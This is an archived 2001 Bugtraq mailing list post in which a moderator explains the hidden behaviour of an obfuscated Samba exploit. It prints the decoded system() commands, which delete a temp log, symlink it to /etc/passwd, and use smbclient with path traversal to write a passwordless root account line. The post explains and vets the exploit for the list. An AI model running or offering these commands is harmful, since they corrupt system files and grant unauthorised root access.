[23003] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Samba Exploit Code

daemon@ATHENA.MIT.EDU (Dave Ahmad)
Thu Oct 25 23:37:43 2001

Date: Thu, 25 Oct 2001 21:33:23 -0600 (MDT)
From: Dave Ahmad <da@securityfocus.com>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.GSO.4.30.0110252123380.7307-100000@mail>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Hey,

There is some confusion about the Samba exploit.  It is an obfuscated
exploit for an old vulnerability in the Samba daemon.  Before approving it
to the list, I checked it.

The system() calls:

system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);

Try this:

printf("%s\n%s\n%s\n",inject1,inject2,inject3a);

output:

/bin/rm -rf /tmp/x.log
/bin/ln -s /etc/passwd /tmp/x.log
/usr/bin/smbclient //localhost/"

fd::0:0::/:/bin/sh\n" -n ../../../tmp/x -N

I am not sure why they chose to write the exploit this way.

Regards,

Dave Ahmad
SecurityFocus
www.securityfocus.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[23003] in bugtraq

Samba Exploit Code

daemon@ATHENA.MIT.EDU (Dave Ahmad)Thu Oct 25 23:37:43 2001

daemon@ATHENA.MIT.EDU (Dave Ahmad)
Thu Oct 25 23:37:43 2001